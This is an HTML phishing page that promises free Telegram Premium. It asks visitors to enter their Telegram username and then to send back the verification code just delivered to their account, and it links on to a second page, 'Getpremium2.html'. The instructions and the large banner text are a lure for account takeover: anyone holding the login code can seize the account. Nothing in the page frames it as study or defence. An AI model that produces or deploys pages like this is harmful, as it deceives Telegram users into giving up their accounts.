<!doctype html>
<html>
     
     
     <head>
       <title>GET TELEGRAM PREMIUM FREELY</title>   
          
          
          
        <style>
             
       .user{
        border-color:#137dbb;    
        border-block-color: #de2cda;   
        width:340px;
        border-radius:20px;
        height:100px;
        font-size:42px;
        text-align:center;
        margin-top:100px;
        margin-left:270px;
       }      
             
       .us{
         background-color:#00ffe6;   
          height:360px;  
     border-radius:40px;
            
            
            
       }      
        .submit{
         width:120px;    
          height:60px;   
            margin-left:380px; 
             margin-top:40px;
             background-color:#6df538;
             font-size:32px;
             border-radius:21px;
        }     
             
             
             
             
             
        </style>  
          
          
        
        
        
        
        
        
        
        
        
        
        

     <h1 style="font-size:60px;">hello there : you have  a desire to be telegram premium user you can premium your account by giving username in below table and for verification you send a code just we have sentto your telegram account</h1>     
          
          
          
          
          
          
     </head>
     <body>
          <div class="us">
               <div><input class="user" place placeholder="username" type="username"  typing="text"required>
          
          </div>
          <button class="submit"><a href="Getpremium2.html">submit</a></button>
          
          
          </div>
       
       <h2 style="font-size:70px; color:#ff0000; text-align:center;"><b><u>instructions</u></b></h2>   
         <h3 style="color:blue; font-size:50px;">1)put your telegram username</h3> 
         <h4 style="color:blue; font-size:50px;">2)send sent verfication code</h4> 
     </body>
</html>